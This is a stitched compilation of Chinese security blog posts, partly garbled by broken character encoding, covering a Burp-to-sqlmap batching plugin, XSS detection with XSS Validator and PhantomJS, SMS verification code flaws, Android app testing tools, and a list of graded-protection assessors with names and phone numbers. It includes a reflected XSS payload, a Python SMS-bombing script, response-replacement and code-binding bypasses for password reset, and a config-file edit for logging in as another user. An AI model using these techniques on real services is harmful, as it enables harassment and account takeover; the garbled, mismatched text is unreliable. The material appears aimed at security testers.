圓通过Burp代理的HTTP流量消息郜记圕圚HTTP History 列衚䞭我们可以批量地选䞭倚䞪url由插件自劚生成类䌌Burp proxy的日志文件然后调甚sqlmap进行检测。

The flowchart of the whole plugin workflow is as follows (see figure).

In the figure, the parts with a light-blue background are the actions performed by the plugin. It mainly does the following:

  1. Check whether the selection is empty; if not, get the selected entries from the History list, whether one record or many.
  2. Generate a log file from the captured HTTP messages in the proxy log format.
  3. Call the sqlmap.py script, passing the generated log file as the parameter value, to run the test.

With that clear, let us look at the proxy log file format.

As shown in the figure, via [Options] >> [Misc] >> [Logging] we tick Proxy's Requests option; a dialog for the log file path and name pops up, and after clicking [Save] the file is created and starts recording the Proxy's request messages. Opening the generated log file in Notepad shows the following format:

The figure above contains two messages; each consists of a header (1 in the figure), the message content (2) and a footer (3), where part 2 is the full content of the request. So we construct the log file by hand in this format by modifying the sqlmap4burp source (on Windows), which gives us the feature.

In the source file SnifferContextMenuFactory.java we found the entry point for log capture, the actionPerformed function inside the createMenuItems function, and changed that code to the version in the figure. The code that creates the log header and footer mainly concatenates strings in the same format, as shown in the figure.

同时修改sqlmap参数的调甚方匏修改SqlmapStarter.java的第21行䞺 自劚化sql泚入

这样我们可以实现批量操䜜的功胜了。

The plugin and its source can be downloaded from the following addresses: plugin download; source download.

After downloading, follow the sqlmap4burp readme to complete the basic configuration before use; otherwise the sqlmap call will fail and batch testing cannot complete.

After installation the plugin looks much like the original one; the figure below shows sending multiple URLs to sqlmap.

The generated log file is shown in the next figure.

The sqlmap window testing multiple URLs in one run is shown in the last figure.


Detecting XSS vulnerabilities with Burp Suite (Burp Suite practical guide, chapter 19)


XSS跚站脚本攻击挏掞是Web应甚皋序䞭最垞见的挏掞之䞀它指的是恶意攻击者埀Web页面里插入恶意html代码圓甚户浏览该页之时嵌入其䞭Web里面的html代码䌚被执行从而蟟到恶意攻击甚户的特殊目的比劂获取甚户的cookie富航到恶意眑站携垊朚马等。根据其觊发方匏的䞍同通垞分䞺反射型XSS、存傚型XSS和DOM-base型XSS。挏掞“泚入理论”讀䞺所有的可蟓入参数郜是䞍可信任的。倧倚数情况䞋我们诎的䞍可信任的数据是指来源于HTTP客户端请求的URL参数、form衚单、Headers以及Cookies等䜆是䞎HTTP客户端请求盞对应的来源于数据库、WebServices、其他的应甚接口数据也同样是䞍可信的。根据请求参数和响应消息的䞍同圚XSS检测䞭䜿甚最倚的就是劚态检测技术以猖皋的方匏分析响应报文暡拟页面点击、錠标滚劚、DOM 倄理、CSS 选择噚等操䜜来验证是吊存圚XSS挏掞。

This chapter covers:

  1. The basic principles of XSS vulnerabilities
  2. How PhantomJS is used in XSS detection
  3. Detecting XSS vulnerabilities with the XSS Validator plugin

The basic principles of XSS vulnerabilities

Generally we can tell from how a vulnerability manifests whether it is of the reflected, stored or DOM-based type.

  1. Reflected XSS means sending someone a URL carrying a parameter with malicious script; when the URL is opened, the parameter carrying the malicious code is parsed and executed as HTML. Its characteristic is that it is non-persistent: the user must click a link carrying the specific parameter to trigger it. The link usually looks like:
    http://localhost/vulnerabilities/xss_r/?name=<script>alert(1);</script>

    The value of the name parameter, <script>alert(1);</script>, enters the program code without any processing and is therefore executed. Source code of this kind is shown in the figure.
  2. Stored XSS means the malicious script is stored in the database; when other users browse the site normally, it reads the illegitimate data stored by the malicious user from the database, and the malicious script is executed. The code structure is usually as shown in the figure.
    The root cause is that the server side does not filter JavaScript out of the content written to the database.
  3. DOM-based XSS means that while the front-end page performs DOM operations, a fragment carrying malicious code is parsed and executed as HTML, causing an XSS vulnerability.
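The reflected case from item 1 above, as an added example that is not code from this chapter: the same page handler in its vulnerable form (the name parameter echoed raw) and in its hardened form (output encoding), together with the marker-based check that the Grep Phrase mechanism described later in this chapter relies on. The handlers, the probe string and the grep phrase value are constructed for this example and stand in for a real target page.

```python
"""Added example: reflected XSS, vulnerable handler vs. hardened handler,
and a marker check in the style of a Grep Phrase. Everything here is
constructed; no network request is made."""
import html
import re

# Constructed probe: a harmless tag name no real page would contain. If the
# response still carries it as a tag, attacker-controlled markup is being
# rendered without encoding.
MARKER = "xss_probe_7f3a"
PROBE = "<%s>" % MARKER
GREP_PHRASE = "xss_result"   # constructed marker a results table can grep for


def render_vulnerable(name):
    """Like the page in the chapter: `name` is echoed into the HTML untouched."""
    return "<html><body>Hello %s</body></html>" % name


def render_hardened(name):
    """Same page with output encoding: <, >, & and quotes become entities,
    so the probe is displayed as text instead of being parsed as a tag."""
    return "<html><body>Hello %s</body></html>" % html.escape(name, quote=True)


def reflects_markup(response):
    """True when the probe survives as real markup (not entity-encoded)."""
    return re.search(r"<%s>" % re.escape(MARKER), response) is not None


def check_handler(handler, payload=PROBE):
    """Run one payload through a handler and tag the body the way xss.js tags
    responses: the grep phrase is appended only when the reflection is real."""
    body = handler(payload)
    hit = reflects_markup(body)
    return {"vulnerable": hit, "body": body + (GREP_PHRASE if hit else "")}


if __name__ == "__main__":
    for h in (render_vulnerable, render_hardened):
        print(h.__name__, check_handler(h))
```

The probe deliberately contains no script: a tag that is rendered as a tag is enough evidence that encoding is missing, and the result can be filtered in a table by the grep phrase exactly as Intruder does with XSS Validator.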

How PhantomJS is used in XSS detection

PhantomJS's official site is http://phantomjs.org; the current latest version is 2.1. It is a WebKit-based server-side JavaScript API, i.e. it provides web-browser functionality without needing a browser: DOM handling, JavaScript, CSS selectors, JSON, Canvas and scalable vector graphics (SVG), among others. Given these capabilities it is commonly used in the following scenarios:

  1. Browserless web testing: supports many test frameworks such as YUI Test, Jasmine, WebDriver, Capybara, QUnit and Mocha.
  2. Page automation: access and manipulate web pages with the standard DOM API or JavaScript frameworks such as jQuery.
  3. Screen capture: programmatically capture CSS, SVG, Canvas and other page content, which enables crawler applications, and build server-side web graphics applications such as screenshot services and vector/raster image applications.
  4. Network monitoring: automatic network performance monitoring, tracking page loads and the related monitoring information.

What we use here is mainly the JavaScript API PhantomJS provides: its monitoring and triggering interfaces let us manipulate the DOM nodes of an HTML page and simulate user actions conveniently.

In Burp Extender's BApp Store there is an XSS detection plugin, XSS Validator, which uses exactly these features of PhantomJS and SlimerJS to verify vulnerabilities. Let us look at how it works.

In the xss-detector subdirectory of the plugin's installation directory there is a file xss.js, which is the concrete PhantomJS detection implementation. In the code we see that by default a listening service is started on local port 8093, acting as a man-in-the-middle proxy (see figure).

When the PhantomJS service is running and intercepts a request, it requests the page through the API and initialises it. During initialisation it enables web security checks, the XSS auditor, JS operations and so on (see figure).

同时自定义alert、confirm、prompt倄理记圕XSS检测信息。

burpsuite检测xss挏掞

JS event detection is handled mainly through an event-dispatch function (see figure).

With these steps understood, you have basically grasped how XSS Validator uses PhantomJS to detect XSS. A similar analysis of this principle by Weibo user @吃瓜矀䌗-Fr1day explains it very clearly; portal: http://www.tuicool.com/articles/3emU7n

The interaction process is illustrated in the figure.

Several key points in the plugin's processing deserve particular attention:

  1. Intruder uses XSS Validator's payload generator, which links the plugin and Intruder together.
  2. The plugin intercepts the messages Intruder sends and hands them to the port the phantomjs service listens on.
  3. xss.js requests the real web server and processes the message, adding the Grep Phrase marker.
  4. The Intruder component uses the Grep Phrase marker to tell whether a vulnerability exists.

Only by understanding how PhantomJS detects XSS can we modify files such as xss.js for our actual situation to meet our own business needs, instead of being confined to what the plugin offers out of the box.


Detecting XSS vulnerabilities with the XSS Validator plugin

The previous section covered the basics of how PhantomJS detects XSS; now let us look at using the XSS Validator plugin.

XSS Validator can be installed either from the BApp Store or manually; manual installation means downloading and building the source. The project's GitHub address is https://github.com/nVisium/xssValidator. Installation is left to the reader; if it is unclear, read the chapter on using Burp plugins. After installation the plugin's interface looks as in the figure.

On the left of that screen are the parameters the plugin needs at run time; on the right are the payloads used to verify XSS. Before using the plugin there are some phantomjs-specific settings to pay attention to; they are also given in the usage notes on the install screen in the app store (see figure).

Before running Intruder, the XSS detection service (the port the phantomjs service listens on) must be started from the command line with phantomjs xss.js. That means phantomjs has to be installed and on the PATH beforehand, or the command will not run. Installing phantomjs is very simple; if you really cannot manage it, read this article; portal: http://www.mincoder.com/article/4795.shtml

After installation, run phantomjs xss.js; the console shows the output in the figure and nothing else.

To keep the explanation simple we leave all other parameters at their defaults and change only two, Grep Phrase and JavaScript functions. Grep Phrase is changed to xxs_result, which serves as the detection marker and column header. Under JavaScript functions we keep only alert and remove the others for now, so the results are easy to read from the console. The final configuration is shown in the screenshot.

After configuring the plugin we configure Intruder. First specify the Grep Phrase value (see figure).

接着Intruder的payload生成噚需芁讟眮䞺xssValidator的。 burpsuite检测xss挏掞burpsuite检测xss挏掞

With the settings shown above, Intruder can be started for detection. While it runs we see a lot of log output in the console; with our configuration, a line printing alert information means that payload found an XSS vulnerability, as shown at 2 in the figure.

同时圚Intruder的执行界面䞊我们可以通过xss_result来查看payload的检测情况那些响应报文䞭存圚挏掞标志的均被标出䟿于我们对消息的区分和倄理。

burpsuite检测xss挏掞


Through this chapter we have gained a deeper understanding of PhantomJS and xssValidator for XSS detection. In practice, because XSS vulnerabilities are complex, the plugin's default payloads cannot find them all; the reader still has to analyse and think to find concrete solutions, and this chapter only serves as a starting point. The further-reading material at the end is for interested readers to analyse and practise. If you know better articles of this kind, e-mail me at t0data@hotmail.com and I will add them to the further reading.

Further reading: 1. Server-Side-XSS-Attack-Detection-with-ModSecurity-and-PhantomJS

Common SMS verification code vulnerabilities: a summary (arbitrary user password reset)


0X00 Preface

SMS verification codes are used more and more in web applications, typically for identity verification in the login, registration and password-reset modules. For the problems SMS codes can have, I collected a number of vulnerability cases and summarise them here, so that my own approach is clearer during testing. The common SMS verification code vulnerabilities are:

1. Ineffective verification

2. Client-side verification bypass

3. SMS bombing

4. Verification code brute force

5. Verification code not bound to the phone number

0X01 Ineffective verification

There is a verification-code module, but it is not connected to the business function. This is ineffective verification, fairly common in newly launched systems.

Case 1

After requesting the SMS code, enter any code, then enter the new password twice, and the user's password is changed successfully: the SMS code is never checked, which can also lead to CSRF and similar problems.

Case 2: arbitrary user registration

Step 1: receive the code on your own phone number and pass verification; the next step jumps to a set-password page.

Step 2: intercept the request and tamper with the phone number, registering with an arbitrary phone number.

Analysis: a business-consistency flaw; identity verification and password setting are split into separate steps, so the verification is ineffective.

 

Reference links: https://woo.49.gs/static/bugs/wooyun-2016-0189300.html

https://woo.49.gs/static/bugs/wooyun-2013-026652.html

0X02 Client-side verification bypass

Client-side verification is insecure; it can lead to arbitrary account registration and login, arbitrary user password reset and a series of other problems.

Case 1: verification code returned directly in plaintext

Click to request the code; a JSON message is observed, and the code turns out to be hidden in the ticket field; entering 9360 logs in successfully.

 

Case 2: encrypted verification code returned

The code is encrypted and returned to the client; the user decrypts it to obtain the code.

 

Case 3: intercept and replace the response

Step 1: change the password with a legitimate account; when the code passes verification, save the data the server returns.

Step 2: with fiddler, set a breakpoint; after clicking Confirm the server returns a "verification code error" message; replace it with {"MessageHeader":{"MessageID":"RSP036","ErrorCode":"S000","Description":"成功"}} and continue, and the password change succeeds.

 

Analysis: common in apps and other client software; intercepting and replacing the response bypasses the client's local check.

Reference link: Juneyao Airlines, bypassing SMS verification to change any account's password

http://cb.drops.wiki/bugs/wooyun-2015-0104509.html

0X03 SMS bombing

SMS bombing is the most common type of SMS verification code vulnerability.

During testing, replaying the SMS code request causes large numbers of unwanted messages to be sent.

Case 1: unlimited sending, no restriction

Case 2: unlimited sending with a fixed interval

One message can be sent every 60 seconds, with no upper limit: SMS bombing. During testing a Python script can be written to measure the sending interval, as in the script the author used:

#coding=utf-8
import json
import requests
import time

start_time = time.time()
count = int(raw_input("Please input counts:"))
phone = raw_input("Please input your phone:")
i = 0
while i < count:
    url = "http://xxxx.cn:9092/map/GenerationUpdate"
    data = json.dumps({"headerInfo": {"functionCode": "randomcode4G"},
                       "requestContent": {"phoneNumber": phone}})

    # a comma between the two header entries was missing on the original page
    header = {
        'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1',
        'Host': 'xxxx.com:9092'
    }
    r = requests.post(url, data=data, headers=header, timeout=5)
    result = r.content
    if result.count('serviceCode":0'):
        # seconds elapsed since the first request when a send was accepted
        print 'Sending message : %d seconds ' % (time.time() - start_time)
    i = i + 1
    #print 'send %s time' % (i)

 

0X04 Verification code brute force

SMS codes are usually 4 or 6 digits; if the server does not limit the verification window and the number of attempts, they can be brute-forced.

Enter the phone number and request a code, enter an arbitrary code, submit and capture the request; set the code field as the payload position with the range 000000-999999 and brute-force it, judging success by the length of the response.

 

0X05 Verification code not bound to the phone number

Normally an SMS code can be used only once. If the code is not bound to the phone number and a code stays valid for some period, the following can happen:

1. Phone A's code can be used by B

2. Every code phone A receives within a time window is usable (this may be a deliberate product policy; reference: https://woo.49.gs/static/bugs/wooyun-2012-08679.html)

Check whether the phone number that received the code matches the phone number it is being used for.

Case 1: arbitrary user password reset

1. Receive a code on your own phone

2. Submit your own code with the victim's phone number; the next step lets you set the new password successfully

 

Reference links:

https://woo.49.gs/static/bugs/wooyun-2014-080315.html

https://woo.49.gs/static/bugs/wooyun-2012-013836.html

 

Mitigations

1. Verify effectively on the server: bind the phone number and the verification code together on the server, and check that binding there.

2. Limit the sending interval for codes on the server, set an expiry time and limit the number of attempts.
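The two mitigations above, as an added example that is not code from the original post: a server-side verification code service that binds each code to the phone number it was sent to, makes it single-use, expires it, caps the number of guesses and refuses to resend inside the send interval, which addresses 0X01, 0X03, 0X04 and 0X05; the code itself never goes back in the HTTP response (0X02). The in-memory storage, the injectable clock, the outbox standing in for the SMS gateway and all limit values are assumptions made for this example.

```python
"""Added example: server-side SMS verification code service implementing
the mitigations listed above. Storage, clock and gateway are stand-ins."""
import hmac
import secrets
import time


class SmsCodeService:
    CODE_LEN = 6
    TTL = 300            # seconds a code stays valid (constructed value)
    SEND_INTERVAL = 60   # minimum seconds between two sends to one number
    MAX_ATTEMPTS = 5     # wrong guesses before the code is discarded

    def __init__(self, clock=time.time):
        self.clock = clock   # injectable so expiry can be tested
        self.pending = {}    # phone -> {"code", "expires", "attempts"}
        self.last_sent = {}  # phone -> time of the last send
        self.verified = {}   # one-time token -> phone that passed verification
        self.outbox = []     # stub SMS gateway: (phone, code) handed to the carrier

    def send_code(self, phone):
        """Issue a fresh code for `phone`. The code leaves the server only
        through the SMS gateway, never in the HTTP response (0X02)."""
        now = self.clock()
        if now - self.last_sent.get(phone, float("-inf")) < self.SEND_INTERVAL:
            return False, "rate_limited"                     # 0X03
        code = "".join(secrets.choice("0123456789") for _ in range(self.CODE_LEN))
        self.pending[phone] = {"code": code, "expires": now + self.TTL, "attempts": 0}
        self.last_sent[phone] = now
        self.outbox.append((phone, code))
        return True, "sent"

    def verify(self, phone, code):
        """Check `code` against the one issued for exactly this `phone`.
        Returns (ok, reason, token); the token proves which phone passed."""
        entry = self.pending.get(phone)
        if entry is None:
            return False, "no_code", None                    # 0X05: another phone's code
        if self.clock() > entry["expires"]:
            del self.pending[phone]
            return False, "expired", None
        entry["attempts"] += 1
        if not hmac.compare_digest(entry["code"], str(code)):
            if entry["attempts"] >= self.MAX_ATTEMPTS:
                del self.pending[phone]
                return False, "locked", None                 # 0X04: guess cap
            return False, "wrong", None
        del self.pending[phone]                              # single use
        token = secrets.token_urlsafe(16)
        self.verified[token] = phone
        return True, "ok", token

    def phone_for(self, token):
        """Consume the proof token. The password-reset step sets the password
        for the phone returned here, not for a phone read from the request,
        which closes the tampering in 0X01 case 2."""
        return self.verified.pop(token, None)


if __name__ == "__main__":
    svc = SmsCodeService()
    print(svc.send_code("13800000001"))
    phone, code = svc.outbox[-1]
    print(svc.verify("13800000002", code))   # (False, 'no_code', None)
    print(svc.verify(phone, code)[:2])       # (True, 'ok')
```

Keeping the verified phone in a server-side token (rather than trusting the phone number submitted with the new password) is what makes the two-step flow consistent; the rate limit, the expiry and the attempt cap are independent controls and all three are needed.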

App penetration testing with Burp Suite (Burp Suite practical guide, chapter 20)


Background

Mobile has been extremely hot over the past year or two; every organisation has a few apps of its own, and as web security engineers we need to understand app security to some degree too. Early this year a colleague with some app security experience joined us and, on an idle day, taught me a few tricks that I share here. As the old saying goes, "a craftsman who wants to do good work must first sharpen his tools": researching app security without a few powerful tools is very troublesome, so this article mainly shares the basics I learned, mostly the use of some mobile testing helper tools.

Emulators

I regularly use two emulators. One is BlueStacks, which I find very well made: installing and operating apps is smooth, with no freezes. The other is the SDK emulator (Software Development Kit), which is the impressive one: like a virtual machine, it can create several virtual devices with different Android versions.

BlueStacks

Download: http://www.bluestacks.net.cn/Download/

During installation it offers to install "给力助手", a helper that assists with operation: it can install APK packages downloaded on the PC into the emulator, uninstall installed apps, and offers many emulator settings, as shown in the figure.

After installing BlueStacks and an app, the app screen looks as in the figure.

 

The functions are all simple to use, so this article does not describe them.

Software Development Kit

Download: http://developer.android.com/sdk/index.html

After downloading, open the bundled eclipse and download an Android image for the emulator. The bundled image is Android 5.0; an older version is recommended for testing apps, since some apps may fail to install on newer images. Downloading the SDK Android image is shown in the figure.

Once the Android image is downloaded the virtual device can be created, as shown in the figure.

 

Packet capture tools

There are many ways to capture app traffic, e.g. set a proxy on the phone and capture with Burp Suite, or use Fiddler. I prefer a small tool, smsniff, which is convenient; captured packets are then put into Burp Suite for modification and resubmission. The tool is shown in the figure.

This tool is small and uses few resources; capturing with burp and the like sometimes produces errors or even stops the app in the virtual device from reaching the network, and that does not happen with this tool.

 

SDK tools

The SDK ships with several handy small tools; the ones I use most are adb and emulator. ADB is a client-server program: the client is the computer you operate from and the server side is the Android device. Both tools are in the SDK package by default.

adb

adb commands:
adb devices lists the running virtual devices, as shown in the figure.

adb install installs an app into the running virtual device, as shown in the figure.

The app downloaded locally is now installed in the running Android virtual device.
adb shell logs into the device shell, as shown in the figure.

adb push sends a file from the computer to the Android virtual device; adb pull sends a file from the virtual device to the computer, as shown in the figure.

adb is very powerful; the above are just a few basic commands, search for the details.

emulator

I currently use just two emulator commands: start an Android virtual device, and start it in proxy mode. They are:

emulator @xiaomi
emulator -http-proxy 127.0.0.1:8080 @xiaomi

xiaomi is the name of the Android virtual device I created. Once it is started with a proxy, burp can capture its traffic.

Decompilation tools

To decompile an app I mainly use apktool and d2j-dex2jar.bat, dex2jar most often.
The apktool decompile command is:

apktool.jar d e:\Appsec\xxx.apk

After it runs, a directory for the app is created in the directory of apktool.jar.
The d2j-dex2jar.bat method is as follows:
open the apk with rar and extract classes.dex from it, then run d2j-dex2jar.bat d:\Appsec\xx\classes.dex
When it finishes, a .jar file is generated in the directory of d2j-dex2jar.bat; open the .jar directly with jd-gui.exe to view the app's source code, as shown in the figure.

 

Case sharing

I can only do simple app security tests, mostly of the authorization-bypass kind, e.g. bypassing the lock-screen password or arbitrary user login. Almost all of them come from design flaws in the app's code or insufficient permission checks.

Arbitrary user login

Once, while testing an app (with some luck), I found an arbitrary user login vulnerability. The local configuration file contained the logged-in user's account and password, and the app's design was odd: it only verified the user's login e-mail, not the password, so modifying the local configuration file allowed logging in as any user and then viewing other users' orders and data. Apps installed in the Android virtual device live under /data/data; the rough directory structure is shown in the figure.

App installation directories all look similar: cache files, the database directory, local files, configuration files and so on. The important directories are databases and shared_prefs, which hold the database files and the configuration files respectively.
Back to the point: looking at the installed app's shared_prefs directory, one file had the content shown in the figure.
You can see the user's login e-mail and password. Change the e-mail to an existing user's e-mail and enter any password; adb shell in and delete the existing configuration file on the virtual device with Linux commands, adb push the modified file back, reopen the app, and it is now logged in as the other user.


National graded protection: recommended list of assessment organisations (information security graded protection)


Information security graded protection (等级保技) is the protection of information and information carriers by importance level, an area of information security work that exists in many countries, including China and the United States. In China, in the broad sense it covers the standards, products, systems and information involved in this work, all of which follow the graded-protection philosophy; in the narrow sense it generally means information system security graded protection.

Published: 2018-09-26

Recommended list of assessment organisations
List of assessment organisations recommended by the Office of the National Information Security Graded Protection Coordination Group
Recommendation certificate no.	Assessment organisation	Registered address	Contact	Phone	Fax	Recommended	Valid until
DJCP2010000001	公安郚信息安党等级保技评䌰䞭心	北京垂海淀区阜成路58号新掲商务倧厊7层	李升	13331101888 010-51607592	010-88152669	Jun 2010	Jun 2019
DJCP2010000002	囜家信息技术安党研究䞭心	北京垂海淀区农倧南路1号硅谷亮城2C座	刘志磊	010-59613930	010-59613975	Jun 2010	Jun 2019
DJCP2010000003	䞭囜信息安党测评䞭心	北京垂海淀区䞊地西路8号院1号楌	宋曊	18518392555 010-8241587	010-82341100	Jun 2010	Jun 2019
DJCP2010000004	电力行䞚信息安党等级保技测评䞭心	北京垂西城区广安闚内倧街311号祥韙商务倧厊䞜区7层	陈雪鞿	010-58681851 13911159653	010-58681835	Jun 2010	Jun 2019
DJCP2011000005	䞭囜金融电子化公叞测评䞭心	北京垂倧兎区西红闚镇䞭囜人民银行蜯件匀发䞭心	王晓燕	13691155959	010-57687650	Jan 2011	Jan 2020
DJCP2011000006	教育信息安党等级保技测评䞭心北京眑盟正通科技有限公叞	北京垂西城区倧朚仓胡同37号2号楌406宀	杚䌟平	13581523179	010-66097058-8003	Jun 2011	Jun 2020
DJCP2012000007	囜家广播电圱电视总局广播电视信息安党测评䞭心	北京垂西城区倍兎闚倖倧街2号	任晓炜	010-86094891 13911237250	010-86094150	Jul 2012	Jul 2021
DJCP2015000008	信息产䞚信息安党测评䞭心	北京垂海淀区北四环䞭路211号	霍珊珊	010-89056107 13810532039	010-89056109	Jun 2010	Jun 2021
DJCP2015000009	公安郚第䞀研究所信息安党等级保技测评䞭心	北京垂海淀区銖䜓南路1号	李秋銙	15010189805 010-68773975	010-68774041	Sep 2015	Sep 2018
DJCP2016000010	囜家信息䞭心电子政务信息安党等级保技测评䞭心	北京垂西城区䞉里河路58号	陈氞刚	13910697749/010-68557181	010-68557621	Jan 2016	Jan 2019
DJCP2016000011	䞭囜铁道科孊研究院集团有限公叞信息系统䞎信息安党评测䞭心	北京垂海淀区倧柳树路2号	朱广劫	13911887019	010-51874406	Jan 2016	Jan 2019
DJCP2016000012	䞭囜电子信息产䞚集团有限公叞第六研究所工䞚控制系统信息安党技术囜家工皋实验宀	北京垂海淀区枅华䞜路25号六所倧厊	讞净凯	13810670234	010-66608900	Mar 2016	Mar 2019
DJCP2016000013	亀通运蟓信息安党等级保技测评䞭心	北京垂朝阳区安倖倖銆后身䞀号	戎明	13911036608 010-65293628	010-65293600	Mar 2016	Mar 2019
DJCP2016000014	工䞚和信息化郚计算机䞎埮电子发展研究䞭心䞭囜蜯件评测䞭心	北京垂海淀区玫竹院路66号	唐刚	13581842497	010-88559311	Nov 2016	Nov 2019
DJCP2016000015	囜家计算机眑络䞎信息安党管理䞭心	北京垂朝阳区裕民路甲3号	陈亮	18800199936/010-82990050	010-82991131	Nov 2016	Nov 2019
DJCP2016000016	囜家安党生产监督管理总局通信信息䞭心	北京垂䞜城区和平里九区甲4号	黄玉钏	15301382700/010-64464822	010-64464682	Dec 2016	Dec 2019
DJCP2018000017	䞭囜信息通信研究院	北京垂海淀区花园北路52号	廖璇	15011358266 010-62300262	010-62300264	Feb 2018	Feb 2021
DJCP2010110018	北京信息安党测评䞭心	北京垂朝阳区北蟰西路12号数字北京倧厊A座10层北	李晚旞	010-84437918	010-84437900	Jun 2010	Jun 2019
DJCP2011110019	北京地铁科技发展有限公叞信息安党测评䞭心	北京垂䞰台区郭公庄南街17号地铁科技倧厊4层	刘晓眡	13911826813	010-58279365	Mar 2011	Mar 2020
DJCP2011110020	联通系统集成有限公叞	北京垂西城区西单北倧街甲133号	胡皓	18601106096	010-66504655	Jan 2011	Jan 2020
DJCP2011110021	䞭囜电信集团系统集成有限莣任公叞	北京垂西城区西盎闚内倧街118号冠华倧厊10层	李景枅	18911050865	010-58553604	Mar 2011	Mar 2020
DJCP2011110022	北京垂电子产品莚量检测䞭心	北京垂厇文区广枠闚内倧街9号	蟹镇	13810206878 67115519	010-67115519	Mar 2011	Mar 2020
DJCP2011110023	䞭科信息安党共性技术囜家工皋研究䞭心有限公叞	北京垂海淀区䞭关村倧街19号新䞭关倧厊B座北翌16层	王束	13901218450 01082486161-805	010-84286355	Apr 2011	Apr 2020
DJCP2011110024	北京金源劚力信息化测评技术有限公叞	北京垂朝阳闚内倧街188号鞿安囜际倧厊A座12层	李速	13311337719	010-65129159	Mar 2011	Mar 2020
DJCP2014110025	银行卡检测䞭心(北京银联金卡科技有限公叞)	北京垂石景山区实兎倧街30号院18号楌1层	匠胜	13911359473	010-52266910	Sep 2014	Sep 2020
DJCP2014110026	工䞚和信息化郚电子工䞚标准化研究院䞭囜电子技术标准化研究院赛西实验宀	北京垂䞜城区安定闚䞜倧街1号	埐克超	13716543386 01064102728	010-64007681	Sep 2014	Sep 2020
DJCP2014110027	囜家应甚蜯件产品莚量监督检验䞭心北京蜯件产品莚量检测检验䞭心	北京垂海淀区䞜北旺西路8号䞭关村蜯件园3A楌	孙陶	13401081493 010-82825511 ext. 687	010-82826408	Sep 2014	Sep 2020
DJCP2014110028	䞭囜移劚通信集团有限公叞研究院	北京垂西城区宣歊闚西倧街32号	方煊譞	13910235872	01063135159	Sep 2014	Sep 2020
DJCP2010120029	倩接圣目信息安党技术股仜有限公叞	倩接垂和平区拉萚道16号和平区电子商务倧厊8001号	后顺犧	13602081295/022-59955105	022-83716497	Dec 2010	Dec 2019
DJCP2010120030	倩接垂兎先道科技有限公叞	倩接滚海高新区华苑产䞚区兰苑路1号增2号1405	刘立民	13512248691 022-58595549	022-58595556	Dec 2010	Dec 2019
DJCP2013120032	恒利執倩接科技有限公叞	倩接垂河䞜区新匀路冠犏倧厊1403	刘玉	13920084252 /022-23684729	022-23361089	Sep 2013	Sep 2019
DJCP2014120033	䞭囜民航倧孊信息安党测评䞭心	倩接垂䞜䞜区接北公路2898号䞭囜民航倧孊北院	马勇	18622199007	02224092294	Dec 2014	Dec 2020
DJCP2015120034	倩接恒埡科技有限公叞	倩接垂南匀区华苑产䞚园区梓园路6号B座711	赵振䞜	13702078116 022-23709999	022-87820620	Jun 2015	Jun 2021
DJCP2016120035	倩接联信蟟蜯件技术有限公叞	倩接滚海高新区华苑产䞚区环倖海泰发展五道16-B6-2-3层	穆慧	18622338959/022-58661520	022-58661517	Jan 2016	Jan 2019
DJCP2018120036	䜰运俐倩接科技发展有限公叞	倩接西青区华苑科技园梅苑路6号海泰倧厊15层	阮晶晶	15510845467		Jul 2018	Jul 2021
DJCP2018120037	倩接涊成信息安党技术检测有限公叞	倩接垂南匀区长江道融䟚䞭心805	孟瑜	13552005005		Jul 2018	Jul 2021
DJCP2011130039	河北赛克普泰计算机咚询服务有限公叞	河北省石家庄垂友谊南倧街46号省科孊院1号楌8楌	李掁	18931158800	0311-83014876	Jan 2011	Jan 2020
DJCP2011130040	河北省信息安党测评䞭心	河北省石家庄垂绎明南倧街196号	黄亮	13730126706	0311-87800832	Mar 2011	Mar 2020
DJCP2011130041	河北恒讯蟟信息科技有限公叞	河北省石家垂桥西区裕华西路128号乐掻倧厊B座20层2009宀	魏氞红	18630129968 0311-66032803	0311-83057218 ext. 819	Aug 2011	Aug 2020
DJCP2011130042	石家庄星安信息安党测评技术有限公叞	河北省石家庄垂长安区䞭山䞜路265号汇景囜际1-2-2204	方英	13656660528	0311-85262112	Dec 2011	Dec 2020
DJCP2016130043	河北兰科眑络工皋集团有限公叞	河北省廊坊垂新䞖纪步行街第二倧街B-15号	蓝方力	17090366555	0316-2084058	Jan 2016	Jan 2019
DJCP2016130044	河北翎莺计算机信息技术有限公叞	河北省石家庄垂新华区聚新路9号聚新花园小区1-2-1502	李䞖歊	18633931100	0311-68002368	Jan 2016	Jan 2019
DJCP2018130045	河北方绎信息系统工皋监理有限公叞	石家庄垂桥西区新石北路380号	王平	13393232399 0311-68120935		Apr 2018	Apr 2021
DJCP2018130046	河北千诚电子科技有限公叞	石家庄垂裕华区槐安䞜路158号鑫科囜际广场C座603	宋晓月	15830156231 0311-89868751		Apr 2018	Apr 2021
DJCP2010140047	倪原枅䌗鑫科技有限公叞	山西绌改瀺范区孊府园区长治路303号807宀	孙艳	15235192617	0351-7029087	Dec 2010	Dec 2019
DJCP2011140048	山西省信息化和信息安党评测䞭心	山西省倪原垂高新匀发区创䞚街19号方倧领地A座16层	匠力绎	13466877805	0351-7028953	Apr 2011	Apr 2020
DJCP2016140049	山西晋信安科技有限公叞	山西省倪原垂高新区电子路环亚时代广场B座1806	马超	13623450548	0351-8387879	Aug 2016	Aug 2019
DJCP2017140050	山西因北矎讯科技有限公叞	山西省长治垂倪行北路168号2å¹¢-1-9层	祁圊军	13903559310	0355-3569562-8001	Jun 2017	Jun 2020
DJCP2017140051	山西联创电子信息技术有限公叞	山西省倧同垂城区氞泰南路西䟧桐城䞭倮二期绌合商务楌5层501号	苑小军	13903528283	0352-7772288	Sep 2017	Sep 2020
DJCP2017140052	山西奜友科技发展有限公叞	倪原垂长治路308号八层	王志圕	13834672759		Nov 2017	Nov 2020
DJCP2010150053	内蒙叀信元眑络安党技术股仜有限公叞	内蒙叀自治区呌和浩特垂新城区成吉思汗䞜街䞎科尔沁北路亀汇倄创新创䞚瀺范园䞀号楌8层	淡琛宇	18647819613	0471-6503533	Dec 2010	Dec 2019
DJCP2013150054	䞭金金融讀证䞭心有限公叞	北京垂西城区菜垂口南倧街平原里20-3	讞定航	13580512580	010-63555032 ext. 719	Sep 2013	Sep 2019
DJCP2014150055	内蒙叀信息系统安党等级测评䞭心	内蒙叀自治区包倎垂昆区民族䞜路63号䞜郜酒店4楌	李執波	13904722919		Jan 2014	Jan 2020
DJCP2011210056	沈阳赛宝科技服务有限公叞	蟜宁省沈阳垂和平区倪原北街2号绌合楌A座四层	王友民	13700048768	024-23447407	Jan 2011	Jan 2020
